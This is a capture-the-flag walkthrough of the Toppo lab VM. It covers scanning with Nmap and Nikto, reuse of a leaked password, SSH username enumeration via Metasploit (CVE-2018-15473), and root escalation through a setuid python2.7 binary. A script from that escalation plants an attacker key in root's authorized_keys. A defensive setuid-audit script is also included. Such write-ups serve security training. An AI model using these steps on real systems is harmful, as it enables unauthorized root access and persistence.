VM Toppo 32 bits - danielcastropalomares/security GitHub Wiki
With Nmap we find that ports 22 (SSH), 80 (HTTP) and 111 (rpcbind) are open:
root@kali:~# nmap -A 172.31.255.136
Starting Nmap 7.70 ( https://nmap.org ) at 2018-10-28 17:31 CET
Nmap scan report for 172.31.255.136
Host is up (0.00037s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
| ssh-hostkey:
| 1024 ec:61:97:9f:4d:cb:75:99:59:d4:c1:c4:d4:3e:d9:dc (DSA)
| 2048 89:99:c4:54:9a:18:66:f7:cd:8e:ab:b6:aa:31:2e:c6 (RSA)
| 256 60:be:dd:8f:1a:d7:a3:f3:fe:21:cc:2f:11:30:7b:0d (ECDSA)
|_ 256 39:d9:79:26:60:3d:6c:a2:1e:8b:19:71:c0:e2:5e:5f (ED25519)
80/tcp open http Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Clean Blog - Start Bootstrap Theme
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100024 1 47325/udp status
|_ 100024 1 51812/tcp status
MAC Address: 08:00:27:8A:1E:36 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
With Nikto we enumerate the web server's structure and find an /admin/ directory (with directory indexing enabled) that looks interesting:
root@kali:~# nikto -host 172.31.255.136
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 172.31.255.136
+ Target Hostname: 172.31.255.136
+ Target Port: 80
+ Start Time: 2018-10-28 17:29:32 (GMT1)
---------------------------------------------------------------------------
+ Server: Apache/2.4.10 (Debian)
+ Server leaks inodes via ETags, header found with file /, fields: 0x1925 0x563f5cf714e80
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.10 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ OSVDB-3268: /admin/: Directory indexing found.
+ OSVDB-3092: /admin/: This might be interesting...
+ OSVDB-3268: /img/: Directory indexing found.
+ OSVDB-3092: /img/: This might be interesting...
+ OSVDB-3268: /mail/: Directory indexing found.
+ OSVDB-3092: /mail/: This might be interesting...
+ OSVDB-3092: /manual/: Web server manual found.
+ OSVDB-3268: /manual/images/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7535 requests: 0 error(s) and 15 item(s) reported on remote host
+ End Time: 2018-10-28 17:29:44 (GMT1) (12 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
We browse to that directory and find a text file called "notes.txt" which contains a password:
http://172.31.255.136/admin/notes.txt
I need to change my password :/ 12345ted123 is too outdated but the technology isn't my thing i prefer go fishing or watching soccer .
The installed OpenSSH version is vulnerable to username enumeration (CVE-2018-15473, which affects OpenSSH releases up to 7.7): a remote client can learn whether an account exists before trying a single password.
root@kali:~# nmap -A -p 22 172.31.255.136
Starting Nmap 7.70 ( https://nmap.org ) at 2018-10-29 21:38 CET
Nmap scan report for 172.31.255.136
Host is up (0.00040s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
So we use the Metasploit auxiliary module ssh_enumusers and test the name "ted", which appears inside the password itself (12345ted123):
msf > use auxiliary/scanner/ssh/ssh_enumusers
msf auxiliary(scanner/ssh/ssh_enumusers) > set RHOSTS 172.31.255.136
RHOSTS => 172.31.255.136
msf auxiliary(scanner/ssh/ssh_enumusers) > set USERNAME ted
USERNAME => ted
msf auxiliary(scanner/ssh/ssh_enumusers) > exploit
[*] 172.31.255.136:22 - SSH - Using malformed packet technique
[*] 172.31.255.136:22 - SSH - Starting scan
[+] 172.31.255.136:22 - SSH - User 'ted' found
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
The user exists, so we try the password found in notes.txt:
ssh ted@172.31.255.136
Once inside, we look for files/executables with the setuid bit set:
The letter s denotes that the setuid (or setgid, depending on the column) bit is set. When an executable is setuid, it runs as the user who owns the executable file instead of the user who invoked the program
ted@Toppo:~$ find / -perm -2 -type f 2>/dev/null | grep -v proc
/usr/bin/python2.7
141007 -rwsrwxrwx 1 root root 3.8M Aug 13 2016 /usr/bin/python2.7
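The one-liner above is the quick manual check. As an added example that is not part of the original write-up, the Python script below performs the same audit while keeping apart the two conditions that `find` line conflates: it walks a tree, reports every regular file carrying the setuid or setgid bit, and flags those that are also world-writable (the combination found on python2.7 here, where any local user can both run the binary as root and overwrite it). The tree it audits is constructed in a temporary directory so the script runs offline as an unprivileged user; `classify_mode()`, `audit_setuid()` and `demo()` are names chosen for this example, not tools from the page.

```python
import os
import shutil
import stat
import tempfile


def classify_mode(mode):
    """Return the set of risk labels for a raw st_mode value.

    'setuid'/'setgid' -> the bits a privilege-escalation hunt looks for
                         (find / -perm -4000  and  find / -perm -2000)
    'world-writable'  -> what `find / -perm -2` actually matches
    """
    labels = set()
    if mode & stat.S_ISUID:
        labels.add('setuid')
    if mode & stat.S_ISGID:
        labels.add('setgid')
    if mode & stat.S_IWOTH:
        labels.add('world-writable')
    return labels


def audit_setuid(root, skip=('/proc', '/sys', '/dev')):
    """Walk `root` and return {path: labels} for every regular file that is
    setuid or setgid. Pseudo-filesystems listed in `skip` are not descended
    into. Entries that also carry 'world-writable' are the critical ones: a
    local user can replace the privileged binary's contents.
    """
    findings = {}
    for dirpath, dirnames, filenames in os.walk(root):
        # Prune pseudo-filesystems instead of descending into them.
        dirnames[:] = [d for d in dirnames
                       if os.path.join(dirpath, d) not in skip]
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # lstat: never follow symlinks
            except OSError:
                continue  # unreadable or vanished entry; keep walking
            if not stat.S_ISREG(st.st_mode):
                continue
            labels = classify_mode(st.st_mode)
            if labels & {'setuid', 'setgid'}:
                findings[path] = labels
    return findings


def demo():
    """Audit a constructed sample tree (three empty files, not files taken
    from the Toppo box) in a temporary directory and return {basename: labels}.
    Setting the setuid bit on a file you own needs no privileges, so this
    runs as a normal user and cleans up after itself."""
    root = tempfile.mkdtemp(prefix='suid_audit_')
    try:
        sample = {
            'plain_binary': 0o755,          # ordinary executable: must not be reported
            'suid_only': 0o4755,            # setuid, not writable (like /usr/bin/passwd)
            'suid_world_writable': 0o4777,  # setuid AND world-writable (python2.7 on Toppo)
        }
        for name, mode in sample.items():
            path = os.path.join(root, name)
            with open(path, 'w'):
                pass
            os.chmod(path, mode)
        return {os.path.basename(p): labels
                for p, labels in audit_setuid(root).items()}
    finally:
        shutil.rmtree(root)


if __name__ == '__main__':
    for name, labels in sorted(demo().items()):
        print('%-22s %s' % (name, ', '.join(sorted(labels))))
    # On a real host, as the low-privileged user: audit_setuid('/')
```

On a live system run `audit_setuid('/')` as the low-privileged user and compare the result with `find / -perm -4000 -type f 2>/dev/null`; any entry that also carries the 'world-writable' label is the one to look at first.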
We find that python2.7 is setuid root. Note that `-perm -2` actually matches world-writable files, not setuid ones (that would be `-perm -4000`); python2.7 matches both, as its mode rwsrwxrwx shows, so any local user can run it as root and could even overwrite the binary. Since the target has SSH running, we take advantage of that and place our own public key in /root/.ssh/authorized_keys, using a Python script executed through the setuid interpreter. First we create the authorized_keys file containing our key:
cat /tmp/authorized_keys
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCoj4xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx root@kali
Now we write a small script:
ted@Toppo:~$ cat copy_key
import os
import sys
from shutil import copyfile

# Key file we prepared in /tmp (our public key) and where root's sshd reads keys from.
source = '/tmp/authorized_keys'
target = '/root/.ssh/authorized_keys'
# Backup of root's current authorized_keys. It must NOT be the same path as
# `source`: backing up onto /tmp/authorized_keys would overwrite our own key
# before it is copied, and the script would install root's old file again.
backup = '/tmp/authorized_keys.bak'

# Create /root/.ssh if it does not exist (we run with euid 0 through the setuid python)
if not os.path.exists('/root/.ssh'):
    os.makedirs('/root/.ssh', 0o700)

try:
    # Back up root's authorized_keys to /tmp, if root already has one
    if os.path.exists(target):
        copyfile(target, backup)
    # Install our authorized_keys in /root/.ssh; sshd refuses group/world-writable key files
    copyfile(source, target)
    os.chmod(target, 0o600)
except IOError as e:
    print("Unable to copy file. %s" % e)
    sys.exit(1)
except Exception:
    print("Unexpected error: %s" % (sys.exc_info(),))
    sys.exit(1)
Basically, the script does the following:
- checks whether the directory /root/.ssh exists, and creates it if not
- backs up the existing /root/.ssh/authorized_keys to /tmp
- copies /tmp/authorized_keys to /root/.ssh/authorized_keys
We run the script with the setuid interpreter:
/usr/bin/python2.7 copy_key
Now we can log in as root over SSH with our key:
ssh root@172.31.255.136
root@Toppo:~# cat flag.txt
_________
| _ _ |
|_/ | | \_|.--. _ .--. _ .--. .--.
| | / .'`\ \[ '/'`\ \[ '/'`\ \/ .'`\ \
_| |_ | \__. | | \__/ | | \__/ || \__. |
|_____| '.__.' | ;.__/ | ;.__/ '.__.'
[__| [__|
Congratulations ! there is your flag : 0wnedlab{p4ssi0n_c0me_with_pract1ce}